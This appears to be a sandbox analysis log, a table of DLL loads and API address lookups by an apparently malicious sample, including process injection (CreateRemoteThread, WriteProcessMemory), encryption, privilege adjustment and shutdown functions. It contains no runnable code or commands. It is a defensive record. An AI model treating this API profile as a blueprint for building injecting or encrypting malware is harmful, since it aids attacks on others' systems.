| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
